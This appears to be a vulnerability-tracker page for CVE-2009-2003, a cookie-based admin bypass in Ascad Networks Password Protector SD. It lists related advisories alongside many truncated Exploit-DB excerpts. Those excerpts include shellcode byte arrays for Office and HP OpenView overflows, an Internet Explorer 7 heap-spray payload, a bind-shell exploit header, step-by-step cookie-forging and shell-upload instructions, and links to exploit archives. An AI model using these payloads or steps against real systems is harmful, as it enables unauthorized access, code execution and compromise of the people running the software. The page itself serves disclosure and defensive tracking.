CVE-2009-2003
published 2009-06-08CVE-2009-2003: Ascad Networks Password Protector SD 1.3.1 allows remote attackers to bypass authentication and gain administrative access by setting the (1) c7portal and (2)…
PriorityP353high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.51%
82.8th percentile
Ascad Networks Password Protector SD 1.3.1 allows remote attackers to bypass authentication and gain administrative access by setting the (1) c7portal and (2) cookname cookies to "admin."
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ascadnetworks | password_protector_sd | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat6.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9phf-78xf-gm33: Ascad Networks Password Protector SD 1
ghsa_unreviewed·2022-05-02
CVE-2009-2003 [HIGH] CWE-287 GHSA-9phf-78xf-gm33: Ascad Networks Password Protector SD 1
Ascad Networks Password Protector SD 1.3.1 allows remote attackers to bypass authentication and gain administrative access by setting the (1) c7portal and (2) cookname cookies to "admin."
Red Hat
FreeRADIUS: Missing check for Tunnel-Password attributes with zero length (DoS) -- re-appearance of CVE-2003-0967
vendor_redhat·2009-09-07·CVSS 5.0
CVE-2009-3111 [MEDIUM] FreeRADIUS: Missing check for Tunnel-Password attributes with zero length (DoS) -- re-appearance of CVE-2003-0967
FreeRADIUS: Missing check for Tunnel-Password attributes with zero length (DoS) -- re-appearance of CVE-2003-0967
The rad_decode function in FreeRADIUS before 1.1.8 allows remote attackers to cause a denial of service (radiusd crash) via zero-length Tunnel-Password attributes, as demonstrated by a certain module in VulnDisco Pack Professional 7.6 through 8.11. NOTE: this is a regression error related to CVE-2003-0967.
Red Hat
neon: billion laughs DoS attack
vendor_redhat·2009-08-18·CVSS 6.5
CVE-2009-2473 [MEDIUM] neon: billion laughs DoS attack
neon: billion laughs DoS attack
neon before 0.28.6, when expat is used, does not properly detect recursion during entity expansion, which allows context-dependent attackers to cause a denial of service (memory and CPU consumption) via a crafted XML document containing a large number of nested entity references, a similar issue to CVE-2003-1564.
Package: gnome-vfs2 (Red Hat Enterprise Linux 4) - Will not fix
Red Hat
apr-util billion laughs attack
vendor_redhat·2009-06-01·CVSS 6.5
CVE-2009-1955 [MEDIUM] apr-util billion laughs attack
apr-util billion laughs attack
The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
No detection rules found.
Exploit-DB
Adobe (Multiple Products) - XML Injection File Content Disclosure
exploitdb·2017-04-07
CVE-2009-3960 Adobe (Multiple Products) - XML Injection File Content Disclosure
Adobe (Multiple Products) - XML Injection File Content Disclosure
---
#!/bin/bash
#
# Exploit Title: Adobe XML Injection file content disclosure
# Date: 07-04-2017
# Exploit Author: Thomas Sluyter
# Website: https://www.kilala.nl
# Vendor Homepage: http://www.adobe.com/support/security/bulletins/apsb10-05.html
# Version: Multiple Adobe products
# Tested on: Windows Server 2003, ColdFusion 8.0 Enterprise
# CVE : 2009-3960
#
# Shell script that let's you exploit a known XML injection vulnerability
# in a number of Adobe products, allowing you to read files that are otherwise
# inaccessible. In Metasploit, this is achieved with auxiliary:scanner:adobe_xml_inject
# This script is a Bash implementation of the PoC multiple/dos/11529.txt.
#
# According to the original Metasploit code, this atta
Exploit-DB
Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)
exploitdb·2011-04-16
CVE-2009-0565 Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)
Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)
---
##
# $Id: ms09-027 10477 2011-04-13 11:59:02Z mc $
##
##
# This file is not part of the Metasploit Framework and may not be subject to
# redistribution and commercial restrictions.
##
#TODO some testing to find the real banned characters and maxlen
# add those parameters to the .rb file
# drop in appropriate directory
# ulimit -s 100000 is required to run this exploit appropriately
require 'msf/core'
#require 'zlib'
class Metasploit3 'MS Word Record Parsing Buffer Overflow(MS-09-027)',
'Description' => %q{
MS Word Record Parsing Buffer Overflow(MS-09-027)
Vulnerble application MS office 2003
Tested on XP SP2 - MS Ofice 2003 v. 11.5604.5606
Bug Found By Wushi of team509
Greets Villy, Abhishek Lyall and A
Exploit-DB
Microsoft Excel - FEATHEADER Record (MS09-067)
exploitdb·2010-08-21·CVSS 7.8
CVE-2009-3129 [HIGH] Microsoft Excel - FEATHEADER Record (MS09-067)
Microsoft Excel - FEATHEADER Record (MS09-067)
---
#MS Excel Malformed FEATHEADER Record Exploit
#CVE-2009-3129, MS09-067, OSVDB-59860
#Vulnerble application MS office 2003/2007
#Tested on XP SP2 - MS Ofice 2003 v. 11.5604.5606
#Sean Larsson - Original Discovery
#!/usr/bin/python
import sys
import zlib
#Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes by RubberDuck =)
shellcode = (
b"\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
b"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
b"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
b"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
b"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
b"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
b"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
b"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
b"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
b"\x
Exploit-DB
Microsoft Word - Record Parsing Buffer Overflow (MS09-027)
exploitdb·2010-08-20
CVE-2009-0565 Microsoft Word - Record Parsing Buffer Overflow (MS09-027)
Microsoft Word - Record Parsing Buffer Overflow (MS09-027)
---
#MS Word Record Parsing Buffer Overflow(MS-09-027)
#Vulnerble application MS office 2003
#Tested on XP SP2 - MS Ofice 2003 v. 11.5604.5606
#Bug Found By Wushi of team509
#!/usr/bin/python
import sys
import zlib
#windows/exec - CMD=calc.exe
shellcode = (
b"\xDB\xDF\xD9\x74\x24\xF4\x58\x2B\xC9\xB1\x33\xBA"
b"\x4C\xA8\x75\x76\x83\xC0\x04\x31\x50\x13\x03\x1C\xBB\x97\x83\x60"
b"\x53\xDE\x6C\x98\xA4\x81\xE5\x7D\x95\x93\x92\xF6\x84\x23\xD0\x5A"
b"\x25\xCF\xB4\x4E\xBE\xBD\x10\x61\x77\x0B\x47\x4C\x88\xBD\x47\x02"
b"\x4A\xDF\x3B\x58\x9F\x3F\x05\x93\xD2\x3E\x42\xC9\x1D\x12\x1B\x86"
b"\x8C\x83\x28\xDA\x0C\xA5\xFE\x51\x2C\xDD\x7B\xA5\xD9\x57\x85\xF5"
b"\x72\xE3\xCD\xED\xF9\xAB\xED\x0C\x2D\xA8\xD2\x47\x5A\x1B\xA0\x56"
b"\x8A\x55\x49\x6
Exploit-DB
Microsoft Windows Outlook Express and Windows Mail - Integer Overflow
exploitdb·2010-05-11·CVSS 9.3
CVE-2010-0816 [CRITICAL] Microsoft Windows Outlook Express and Windows Mail - Integer Overflow
Microsoft Windows Outlook Express and Windows Mail - Integer Overflow
---
Application: Microsoft Outlook Express
Microsoft Windows Mail
Platforms: Windows 2000
Windows XP
Windows Vista
Windows server 2003
Windows Server 2008 SR2
Exploitation: Remote Exploitable
CVE Number: CVE-2010-0816
Discover Date: 2009-09-11
Author: Francis Provencher (Protek Research Lab's)
Website: http://www.protekresearchlab.com
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) Products affected
5) The Code
#####################################################################################
1) Introduction
Windows Mail is an e-mail and newsgroup client included in Windows Vista, that was superseded by Wind
Exploit-DB
HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Topic Overflow
exploitdb·2010-03-30
CVE-2009-4178 HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Topic Overflow
HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Topic Overflow
---
#!/usr/bin/python
# Exploit title: HP OpenView NNM OvWebHelp.exe CGI Topic overflow
# Date: 2010.03.30
# Software link: hp.com
# Version: 7.53
# Tested on: Windows 2003 SP2
# CVE: 2009-4178
# Code:
############################################
# Trying 172.16.29.130...
# Connected to 172.16.29.130.
# Escape character is '^]'.
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Program Files\HP OpenView\www\cgi-bin>
############################################
import struct
import socket
import httplib
import urllib
#[*] x86/alpha_mixed succeeded with size 746 (iteration=1)
sc =(
"\x89\xe3\xd9\xc3\xd9\x73\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x4
Exploit-DB
Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x Vulnerabilities
exploitdb·2009-12-30
Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x Vulnerabilities
Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x Vulnerabilities
---
#!/usr/bin/python
#
# Exploit Title: Exploit for Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x
# Date: 29 dec 2009
# Author: Emanuele 'emgent' Gentili and Emanuele 'crossbower' Acri
# Software Link: N/A
# Version: IIS 5.x/6.x
# Tested on: Windows 2003 Server SP2
# CVE : N/A
# Code : http://www.backtrack.it/~emgent/exploits/IIS-asp.py
# Special greetz. Carlo Velletri ([email protected])
#
# Vulnerability Description:
# The Vulnerability discovered in Microsoft Internet Information Services (IIS) can be exploited by malicious people to potentially bypass
# certain security restrictions and compromise a vulnerable system.
# The vulnerability is caused due to the web server incorrectly exe
Exploit-DB
ASP Simple Blog 3.0 - Arbitrary File Upload
exploitdb·2009-12-28
ASP Simple Blog 3.0 - Arbitrary File Upload
ASP Simple Blog 3.0 - Arbitrary File Upload
---
| # Title : ASP Simple Blog version 3.0 Upload shell Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
| # EDB-ID : |
| # CVE-ID : () |
| # OSVDB-ID : () |
| # DAte :16/12/2009 |
| # Verified : |
| # Web Site : www.iq-ty.com |
| # Published: |
| # Script : ASP Simple Blog version 3.0 Copyright (c) 2003-2006 www.8pixel.net |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
| # Bug : XSS |
====================== Exploit By indoushka =================================
| # Exploit :
|
| 1- http://127.0.0.1/simpleblog3/admin/includes/FCKeditor/editor/filemanager/upload/test.html
|
========
Exploit-DB
Simplicity oF Upload 1.3.2 - Arbitrary File Upload
exploitdb·2009-12-20
CVE-2009-4818 Simplicity oF Upload 1.3.2 - Arbitrary File Upload
Simplicity oF Upload 1.3.2 - Arbitrary File Upload
---
# Exploit Title: Simplicity oF Upload (1.3.2) Remote File Upload Vulnerability
# Date: 20-12-2009
# Author: Master Mind
# Software Link: http://www.phpsimplicity.com/scripts.php?id=3
# Version: 1.3.2
# CVE : [N/A]
# Tested on: Windows 2003 Server
~ Script Name : Simplicity oF Upload (1.3.2)
~ Language : php
~ Download Page : http://www.phpsimplicity.com/scripts.php?id=3
~ Author : Master Mind
~ Home : www.shdowskill.com , www.vbspiders.com
Dork : Powered By: © Simplicity oF Upload
Exploit :
http://{target}/[script path/upload.php
upload you shell [Shell.php.gif]
Enjoy :)
Greets : The Electronic Bomb , Twi[L]ighT , R3D EYE, Doom[PS] , AND ALL MEMBERS.
Exploit-DB
Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal
exploitdb·2009-09-03·CVSS 8.8
CVE-2009-0927 [HIGH] Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal
Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal
---
#!/usr/bin/env python
#
# *** Acrobat Reader - Collab getIcon universal exploiter ***
# evil_pdf.py, tested on Operating Systems:
# Windows XP SP3 English/French
# Windows 2003 SP2 English
# with Application versions:
# Adobe Reader 9.0.0/8.1.2 English/French
# Test methods:
# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7
# 24/06/2009 - Created by Ivan Rodriguez Almuina (kralor). All rights reserved.
# [Coromputer] raised from the ashes.
#
http://www.coromputer.net/CVE-2009-0927_package.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9579.zip (2009-CVE-2009-0927_package.zip)
# milw0rm.com [2009-09-03]
Exploit-DB
Microsoft Windows Server 2003 - '.EOT' Blue Screen of Death Crash
exploitdb·2009-08-11
CVE-2009-3020 Microsoft Windows Server 2003 - '.EOT' Blue Screen of Death Crash
Microsoft Windows Server 2003 - '.EOT' Blue Screen of Death Crash
---
MS Windows 2003 (EOT File) BSOD Crash Exploit
author: webDEViL
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9417.zip (2009-wwbsod.zip)
# milw0rm.com [2009-08-11]
Exploit-DB
Ascad Networks 5 - Products Insecure Cookie Handling
exploitdb·2009-05-14
CVE-2009-2003 Ascad Networks 5 - Products Insecure Cookie Handling
Ascad Networks 5 - Products Insecure Cookie Handling
---
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
____ _ _ _ _ ___ _ __
/ ___| | || | | \ | | / _ \ | |/ /
| | _ | || |_ | \| | | | | | | ' /
| |_| | |__ _| | |\ | | |_| | | . \
\____| |_| |_| \_| \___/ |_|\_\...FROM IRAN
Ascad Networks 5 Products Insecure Cookie Handling Vulnerability
[»] Script:.............[ Ascad Networks Scripts ]....................
[»] Website:............[ http://www.ascadnetworks.com ]..............
[»] Today:..............[ 1305009 ]...................................
[»] Founder:............[ G4N0K | mail[.]ganok[sh!t]gmail.com ].......
[+] c7 Portal <= v1.1.0
Live...: http://hatcocorporati
Exploit-DB
Password Protector SD 1.3.1 - Insecure Cookie Handling
exploitdb·2009-05-13
CVE-2009-2003 Password Protector SD 1.3.1 - Insecure Cookie Handling
Password Protector SD 1.3.1 - Insecure Cookie Handling
---
+++++++++++++++++++ information +++++++++++++++++++++++
[+] Script : Password Protector SD v1.3.1 Insecure Cookie Handling Vulnerability
[+] Found by : Mr.tro0oqy
[+] C0ntact : [email protected]
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
exploit:
step 1 [add]: javascript:document.cookie="c7portal=admin;path=/";
step 2 [add]: javascript:document.cookie="cookname=admin;path=/";
step 3 [to login] : http://localhost/cgi-bin/ppSD/admin.pl?L=home
in control panel :
http://www.passwordprotectorsd.com/cgi-bin/ppSD/admin.pl?L=home
demo:
http://www.passwordprotectorsd.com/cgi-bin/c7/admin.pl
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
ThE g0bL!N - spyboy - red virus - virus_hima - Red-D3v1L
Cyb3r-DeViL-
Exploit-DB
Microsoft Windows XP/Vista/2003/2008 - WMI Service Isolation Privilege Escalation
exploitdb·2009-04-14
CVE-2009-0078 Microsoft Windows XP/Vista/2003/2008 - WMI Service Isolation Privilege Escalation
Microsoft Windows XP/Vista/2003/2008 - WMI Service Isolation Privilege Escalation
---
source: https://www.securityfocus.com/bid/34442/info
Microsoft Windows is prone to a privilege-escalation vulnerability.
Successful exploits may allow attackers to elevate their privileges to LocalSystem, which would facilitate the complete compromise of affected computers.
The issue affects the following:
Windows XP SP2
Windows Server 2003
Windows Vista
Windows Server 2008
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6705.zip
Exploit-DB
Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation
exploitdb·2009-04-14
CVE-2009-0079 Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation
Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation
---
source: https://www.securityfocus.com/bid/34443/info
Microsoft Windows is prone to a privilege-escalation vulnerability.
Successful exploits may allow attackers to elevate their privileges to LocalSystem, which would facilitate the complete compromise of affected computers.
The issue affects the following:
Windows XP SP2
Windows Server 2003
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6705.zip
Exploit-DB
Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)
exploitdb·2009-02-20
CVE-2009-0076 Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)
Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)
---
var c=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
var array = new Array();
var ls = 0xd00000;
var b = unescape("%u0c0c%u0c0c");
while(b.lengthwindow.setTimeout("ok();",800);
# milw0rm.com [2009-02-20]
Exploit-DB
Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
exploitdb·2009-02-20
CVE-2009-0076 Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
---
#!/usr/bin/env python
###############################################################################
# MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) #
###############################################################################
# #
# Thanks to str0ke for finding this in the wild. #
# #
# Tested on Windows 2003 SP2 R2 #
# #
# Written by SecureState R&D Team (ReL1K) #
# http://www.securestate.com #
# #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #
# #
###############################################################################
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys
try:
import psyco
psyco.full()
except ImportErro
Exploit-DB
FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)
exploitdb·2009-02-05
CVE-2009-0546 FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)
FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)
---
#!usr/bin/perl -w
################################################################################
# Reference:
# http://security.bkis.vn/?p=329
# https://www.securityfocus.com/bid/33630/info
#
# Tested on Windows Server 2003 with FeedMon 2.7.0.0. FeedMon crashes
# whenever I am trying to Unsubscribe from the malicious(overlylong) feed.
#
# Thanx to milw0rm, str0ke, security.bkis, @rp m@n, evilfingers
# and all security researchers.
#
#$$$$$ This was strictly written for educational purpose. Use it at
#$$$$$ your own risk. Author will not bare any responsibility for any
#$$$$$ damages watsoever.
#
#####MOST OF THE CODE I GOT FROM###############################################
#####http://search.cpan.org/~madghoul/XML-OPML-0.26/OPML
Exploit-DB
Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation
exploitdb·2009-02-02
CVE-2009-1808 Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation
Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation
---
// source: https://www.securityfocus.com/bid/35120/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
Attackers may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will facilitate the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
#include
int main()
{
WCHAR c[1000] = {0};
memset(c, �c�, 1000);
SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);
WCHAR b[1000] = {0};
SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);
return 0;
}
Exploit-DB
FreeRadius 0.x/1.1.x - Tag Field Heap Corruption
exploitdb·2003-11-20
CVE-2003-0967 FreeRadius 0.x/1.1.x - Tag Field Heap Corruption
FreeRadius 0.x/1.1.x - Tag Field Heap Corruption
---
source: https://www.securityfocus.com/bid/9079/info
FreeRADIUS is prone to a heap-corruption vulnerability when handling of tag-field input. An attacker may be able to exploit this issue to deny service to legitimate users of a vulnerable FreeRADIUS server.
This issue was initially reported as a vulnerability in how the software handles 'Tunnel-Password' attribute in Access-Request packets, but the issue turns out to have wider scope, affecting tag-field input in general.
This vulnerability affects FreeRADIUS 0.4.0 through 0.9.2.
UPDATE (September 9, 2009): This issue was fixed in 2003 but reintroduced later. FreeRADIUS 1.1.3 through 1.1.7 are also vulnerable.
bash-2.05$ echo -ne "\x01\x01\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x
Bugzilla
CVE-2009-3111 FreeRADIUS: Missing check for Tunnel-Password attributes with zero length (DoS) -- re-appearance of CVE-2003-0967
bugzilla·2009-09-08·CVSS 5.0
CVE-2009-3111 [MEDIUM] CVE-2009-3111 FreeRADIUS: Missing check for Tunnel-Password attributes with zero length (DoS) -- re-appearance of CVE-2003-0967
CVE-2009-3111 FreeRADIUS: Missing check for Tunnel-Password attributes with zero length (DoS) -- re-appearance of CVE-2003-0967
A missing check for proper form of certain attributes was originally
found in the way FreeRADIUS used to decode specific RADIUS attributes
into data structures. A remote attacker could send a specially-crafted
RADIUS packet to the RADIUS server, leading to a denial of service
(radiusd daemon crash), CVE-2003-0967. This flaw was fixed in upstream
0.9.3 version of FreeRADIUS and re-introduced later.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0967
https://www.kb.cert.org/vuls/id/541574
http://rhn.redhat.com/errata/RHSA-2003-386.html
Upstream patch:
http://github.com/alandekok/freeradius-server/commit/860cad9e02ba344edb0038419e415fe05a9a01f4
Bugzilla
CVE-2009-1955 apr-util billion laughs attack
bugzilla·2009-06-08·CVSS 6.5
CVE-2009-1955 [MEDIUM] CVE-2009-1955 apr-util billion laughs attack
CVE-2009-1955 apr-util billion laughs attack
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-1955 to the following vulnerability:
The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in
Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn
modules in the Apache HTTP Server, allows remote attackers to cause a
denial of service (memory consumption) via a crafted XML document
containing a large number of nested entity references, as demonstrated
by a PROPFIND request, a similar issue to CVE-2003-1564.
Discussion:
*** Bug 503814 has been marked as a duplicate of this bug. ***
---
Public exploit posted to milw0rm:
http://www.milw0rm.com/exploits/8842
Upstream patch:
http://svn.apache.org/viewvc?view=rev&revision=781403
http://marc.info/?l=a
Bugzilla
CVE-2009-0259 openoffice.org: text converter memory corruption via a crafted (1) .doc, (2) .wri, or (3) .rtf Word97 file
bugzilla·2008-12-10·CVSS 9.3
CVE-2009-0259 [CRITICAL] CVE-2009-0259 openoffice.org: text converter memory corruption via a crafted (1) .doc, (2) .wri, or (3) .rtf Word97 file
CVE-2009-0259 openoffice.org: text converter memory corruption via a crafted (1) .doc, (2) .wri, or (3) .rtf Word97 file
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-4841 to
the following vulnerability:
The WordPad Text Converter for Word 97 files in Microsoft Windows 2000
SP4, XP SP2, and Server 2003 SP1 and SP2 allows remote attackers to
execute arbitrary code via a crafted (1) .doc, (2) .wri, or (3) .rtf
Word 97 file that triggers memory corruption, as exploited in the wild
in December 2008. NOTE: As of 20081210, it is unclear whether this
vulnerability is related to a WordPad issue disclosed on 20080925 with
a 2008-crash.doc.rar example, but there are insufficient details to be
sure.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4841
http
2009-06-08
Published